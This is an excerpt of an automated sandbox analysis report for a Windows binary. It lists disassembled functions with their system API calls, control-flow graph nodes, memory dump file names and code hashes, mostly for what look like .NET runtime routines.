                    • Part of subcall function 000000013F6026B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F6026BF
                    • Part of subcall function 000000013F6026B0: GetNumaHighestNodeNumber.KERNEL32 ref: 000000013F6026FD
                    • Part of subcall function 000000013F6026B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F602729
                    • Part of subcall function 000000013F6026B0: GetProcessGroupAffinity.KERNEL32 ref: 000000013F60273A
                    • Part of subcall function 000000013F6026B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000013F5FB04A), ref: 000000013F602749
                    • Part of subcall function 000000013F5FD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F5FD8AD
                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB09A
                  • GetProcessAffinityMask.KERNEL32 ref: 000000013F5FB0AD
                  • QueryInformationJobObject.KERNEL32 ref: 000000013F5FB0FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                  • String ID: PROCESSOR_COUNT
                  • API String ID: 296690692-4048346908
                  • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction ID: 97937c418a6d1e838c490c97c64156e8508b87ca622e6b1581f65ea1081cccfa
                  • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction Fuzzy Hash: 7331BE72E04B42D6EB149B54D8853EEB7A1FB84798F50007DD69A47BA9DB28CB0FC700
                  Function 000000013F5F6620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 000000013F5F6726
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise$Sleep
                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                  • API String ID: 3706814929-926682358
                  • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction ID: 5ba1d3ff431d12d2f5f7c456d578d84fd6b68bfad20517711a6d75d934684790
                  • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction Fuzzy Hash: F4411B32A12B48C6EB949F29F4543E933E0E704B84F04817EDA4D477A5DF39C65AC740
                  Function 000000013F5FB320 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$CloseCreateHandlePriorityResume
                  • String ID:
                  • API String ID: 3633986771-0
                  • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction ID: c53476090daabfae27d130beb6d721c57b5ae109c99f7870010b57cb7166dc4f
                  • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction Fuzzy Hash: 78E06DB9A0070182EB149F26A81A3A56750AB98B85F08443CCD5A067A1EE3C82878600
                  Function 000000013F602080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 119 13f602080-13f6020b1 120 13f6020b7-13f6020d2 GetCurrentProcess call 13f658be5 119->120 121 13f60216f-13f60218c GlobalMemoryStatusEx 119->121 120->121 136 13f6020d8-13f6020e0 120->136 123 13f602212-13f602215 121->123 124 13f602192-13f602195 121->124 125 13f602217-13f60221b 123->125 126 13f60221e-13f602221 123->126 128 13f602201-13f602204 124->128 129 13f602197-13f6021a2 124->129 125->126 134 13f602223-13f602228 126->134 135 13f60222b-13f60222e 126->135 132 13f602206 128->132 133 13f602209-13f60220c 128->133 130 13f6021a4-13f6021a9 129->130 131 13f6021ab-13f6021bc 129->131 139 13f6021c0-13f6021d1 130->139 131->139 132->133 140 13f602238-13f60225b call 13f658fb0 133->140 141 13f60220e-13f602210 133->141 134->135 135->140 142 13f602230 135->142 137 13f6020e2-13f6020e8 136->137 138 13f60214a-13f60214f 136->138 144 13f6020f1-13f602105 137->144 145 13f6020ea-13f6020ef 137->145 149 13f602161-13f602164 138->149 150 13f602151-13f602154 138->150 147 13f6021d3-13f6021d8 139->147 148 13f6021da-13f6021ee 139->148 143 13f602235 141->143 142->143 143->140 151 13f602109-13f60211a 144->151 145->151 153 13f6021f2-13f6021fe 147->153 148->153 149->140 156 13f60216a 149->156 154 13f602156-13f602159 150->154 155 13f60215b-13f60215e 150->155 157 13f602123-13f602137 151->157 158 13f60211c-13f602121 151->158 153->128 154->149 155->149 156->143 159 13f60213b-13f602147 157->159 158->159 159->138
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3261791682-2766056989
                  • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction ID: 0aaeed6543946ea420c5b98141c189bb6de4886310ad8f718cc2790efbebf161
                  • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction Fuzzy Hash: F8417DB1B09B4681F956CB36925639992627F59BC0F28C339AF0F77744FB38C5938600
                  Function 000000013F621660 Relevance: 5.1, APIs: 4, Instructions: 112COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 205 13f621660-13f62168b 206 13f6216bc 205->206 207 13f62168d-13f621691 205->207 209 13f6216be-13f6216dd 206->209 207->206 208 13f621693-13f621697 207->208 208->206 210 13f621699-13f62169d 208->210 211 13f6216e3-13f6216fe EnterCriticalSection 209->211 212 13f621767-13f621775 209->212 214 13f6216b5-13f6216ba 210->214 215 13f62169f-13f6216a3 210->215 216 13f621727-13f621732 211->216 217 13f621700-13f62171f 211->217 213 13f621778-13f62177a 212->213 218 13f6217c1-13f621812 call 13f61e7a0 213->218 219 13f62177c-13f621788 call 13f602930 213->219 214->209 220 13f6216a5-13f6216ac 215->220 221 13f6216ae-13f6216b3 215->221 222 13f6217b1-13f6217b8 LeaveCriticalSection 216->222 224 13f621734-13f621742 216->224 217->222 223 13f621725 217->223 230 13f621815-13f621833 218->230 229 13f62178d-13f62178f 219->229 220->209 221->209 226 13f6217bd-13f6217bf 222->226 228 13f621745-13f621765 LeaveCriticalSection 223->228 224->228 226->230 228->213 229->218 232 13f621791-13f621799 229->232 232->226 233 13f62179b-13f6217aa EnterCriticalSection 232->233 233->222
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6216EA
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F621759
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6217A2
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013F60D516,?,-8000000000000000,00000001,000000013F61C6D6), ref: 000000013F6217B8
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction ID: 90755c36d04ddddf8d24133ceef858c364a41517e52814bfdd1321a1213404bf
                  • Opcode Fuzzy Hash: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction Fuzzy Hash: 46517DB6A08A41D2EB25CF11E8853E877B0F745794F58023ADA9D13AAADB38C757C300
                  Function 000000013F6304D0 Relevance: 5.1, APIs: 4, Instructions: 84COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 234 13f6304d0-13f630503 235 13f6305a1-13f6305a3 234->235 236 13f630509-13f630527 EnterCriticalSection 234->236 237 13f6305b2-13f6305c1 call 13f602930 235->237 238 13f6305a5-13f6305ac 235->238 239 13f630529-13f63052c 236->239 240 13f630550-13f63055b 236->240 247 13f6305c6-13f6305cb 237->247 238->237 241 13f6305ae-13f6305b0 238->241 243 13f630562-13f630576 239->243 244 13f63052e-13f630549 239->244 240->243 245 13f63055d-13f630560 240->245 246 13f63060d-13f630625 241->246 249 13f63057f-13f630593 LeaveCriticalSection 243->249 250 13f630578 243->250 244->243 248 13f63054b-13f63054e 244->248 245->249 247->246 251 13f6305cd-13f6305d5 247->251 248->249 252 13f630598-13f63059b 249->252 253 13f630595 249->253 250->249 251->246 254 13f6305d7-13f6305f4 EnterCriticalSection 251->254 252->235 255 13f63059d-13f63059f 252->255 253->252 256 13f6305f6 254->256 257 13f6305fd-13f630609 LeaveCriticalSection 254->257 255->246 256->257 257->246
                  APIs
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630510
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630586
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F6305DE
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013F61DA29), ref: 000000013F630604
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction ID: 0f350382378466a648f7f53d518fc2d54cce49ea93ec0083c0e8839865ab0b89
                  • Opcode Fuzzy Hash: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction Fuzzy Hash: 6D4192B1E08A14E2FA25DF10E9863E927B4F755798F54403ED9CA462B6DB78C64BC310
                  Function 000000013F60CF30 Relevance: 4.7, APIs: 3, Instructions: 195threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 258 13f60cf30-13f60cf5d 259 13f60cf5f 258->259 260 13f60cf66-13f60cf6e 259->260 261 13f60cf7c-13f60cf9c 260->261 262 13f60cf70-13f60cf7a call 13f630880 260->262 264 13f60cfa2-13f60cfa8 261->264 265 13f60d093-13f60d099 261->265 262->259 267 13f60d07d-13f60d088 264->267 268 13f60cfae 264->268 269 13f60d0a6-13f60d0a9 265->269 270 13f60d09b-13f60d0a1 call 13f613670 265->270 267->264 271 13f60d08e 267->271 272 13f60cfb0-13f60cfb6 268->272 274 13f60d16a-13f60d174 call 13f624b90 269->274 275 13f60d0af-13f60d0b6 269->275 270->269 271->265 277 13f60d022-13f60d032 call 13f5f9750 272->277 278 13f60cfb8-13f60cfc0 272->278 288 13f60d176-13f60d17c 274->288 289 13f60d1dc-13f60d1df 274->289 279 13f60d161-13f60d168 275->279 280 13f60d0bc-13f60d0c4 275->280 299 13f60d034-13f60d03b 277->299 300 13f60d056-13f60d05e 277->300 278->277 284 13f60cfc2-13f60cfc9 278->284 279->274 281 13f60d112-13f60d126 call 13f60dbe0 279->281 280->279 285 13f60d0ca-13f60d0f4 280->285 294 13f60d12b-13f60d135 281->294 291 13f60d019-13f60d020 SwitchToThread 284->291 292 13f60cfcb-13f60cfd8 284->292 285->279 286 13f60d0f6-13f60d10d call 13f62e2b0 285->286 286->281 297 13f60d18d-13f60d19d call 13f6306c0 288->297 298 13f60d17e-13f60d181 288->298 289->281 296 13f60d1e5-13f60d1fd call 13f60d660 289->296 295 13f60d073-13f60d077 291->295 301 13f60cff8-13f60cffc 292->301 302 13f60cfda 292->302 294->260 306 13f60d13b-13f60d160 294->306 295->267 295->272 296->294 322 13f60d1ab-13f60d1b1 297->322 323 13f60d19f-13f60d1a9 call 13f624b90 297->323 298->297 308 13f60d183-13f60d188 call 13f613670 298->308 309 13f60d04c-13f60d051 call 13f6028e0 299->309 310 13f60d03d-13f60d043 299->310 303 13f60d06a-13f60d06c 300->303 304 13f60d060-13f60d065 call 13f630880 300->304 301->295 305 13f60cffe-13f60d006 301->305 312 13f60cfe0-13f60cfe4 302->312 303->295 316 13f60d06e call 13f5f96d0 303->316 304->303 305->295 317 13f60d008-13f60d017 call 13f5f9750 SwitchToThread 305->317 308->297 309->300 310->309 320 13f60d045-13f60d04a SwitchToThread 310->320 312->301 314 13f60cfe6-13f60cfee 312->314 314->301 324 13f60cff0-13f60cff6 314->324 316->295 317->303 320->300 328 13f60d1b3-13f60d1b6 322->328 329 13f60d1bc-13f60d1d7 call 13f62e2b0 322->329 323->289 323->322 324->301 324->312 328->281 328->329 329->289
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction ID: b644f4fb6a2e8f532c01825d11dd82533922382075aa776276fa9da7d503c99f
                  • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction Fuzzy Hash: 0571C2B1F0860387FB689F55AC467EA27A1BB40784F14027DAD5A972DADF39CA438704
                  Function 000000013F602930 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000013F605348,?,?,0000000A,000000013F6043A0,?,?,00000000,000000013F5FEA91), ref: 000000013F602957
                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,000000013F605348,?,?,0000000A,000000013F6043A0,?,?,00000000,000000013F5FEA91), ref: 000000013F602977
                  • VirtualAllocExNuma.KERNEL32 ref: 000000013F602998
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual$CurrentNumaProcess
                  • String ID:
                  • API String ID: 647533253-0
                  • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction ID: 9cbbf5815683449ce7b181dc77c14c9ab82dbb6328c10449afd3571c34a514e3
                  • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction Fuzzy Hash: 83F0C271B04690C2EB208F1AF405749BB60BB49FD4F584138EF9C17B68CB3DC6828B04
                  Function 000000013F5F9F40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: EventRegister
                  • String ID: gcConservative
                  • API String ID: 3840811365-1953527212
                  • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction ID: f2627492e1bf40e33282682e4a479efd2767b53344183f915ec2a6b47560cabb
                  • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction Fuzzy Hash: 87312231A01B4AC2FB089F59E9883D937A0F749784F4080BEDA4E0766ADB39C75BC751
                  Function 000000013F658ED4 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 361 13f658ed4-13f658edd 362 13f658eee-13f658ef6 malloc 361->362 363 13f658ef8-13f658efd 362->363 364 13f658edf-13f658ee9 call 13f6606d3 362->364 367 13f658efe-13f658f02 364->367 368 13f658eeb 364->368 369 13f658f04-13f658f09 call 13f659a2c 367->369 370 13f658f0a-13f658f0f call 13f659a4c 367->370 368->362 369->370
                  APIs
                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013F658FD9,?,?,?,?,000000013F5FDBC1,?,?,?,000000013F5FE13C,00000000,00000020,?), ref: 000000013F658EEE
                  • Concurrency::cancel_current_task.LIBCPMT ref: 000000013F658F04
                    • Part of subcall function 000000013F659A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 000000013F659A35
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                  • String ID:
                  • API String ID: 205171174-0
                  • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction ID: b41c23d85cf2b60ab07a75abac0f6377ae806af8e89f4555b376d9b60acf166f
                  • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction Fuzzy Hash: 0EE017F0E1221EC1FD2866B65A5F3E500600B58370E2C3B3C5D7E69AD2AA2486978220
                  Function 000000013F5FB2E0 Relevance: 3.0, APIs: 2, Instructions: 18threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 375 13f5fb2e0-13f5fb302 CreateThread 376 13f5fb309-13f5fb318 CloseHandle 375->376 377 13f5fb304-13f5fb308 375->377
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CloseCreateHandleThread
                  • String ID:
                  • API String ID: 3032276028-0
                  • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction ID: c40bad9cabd79494d5fba423d49e7e7f115b829dd5e6f12864fc9b85a9abbaa9
                  • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction Fuzzy Hash: 43D012B5E0174082DF14DF6568053553AD1BB98B84F85413CD94D83724FA3C83168900
                  Function 000000013F616690 Relevance: 2.6, APIs: 2, Instructions: 107COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction ID: 38930c0044c4228f9f5fb29e733e7f3684e74c9d0a8a2125d37e32b6f83d32d3
                  • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction Fuzzy Hash: D841ACB5A00A4086EB14CF29E8953E537A0EB45BF4F14437DDAB8876E9CF26C647C340
                  Function 000000013F5FFE40 Relevance: 2.6, APIs: 2, Instructions: 86memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
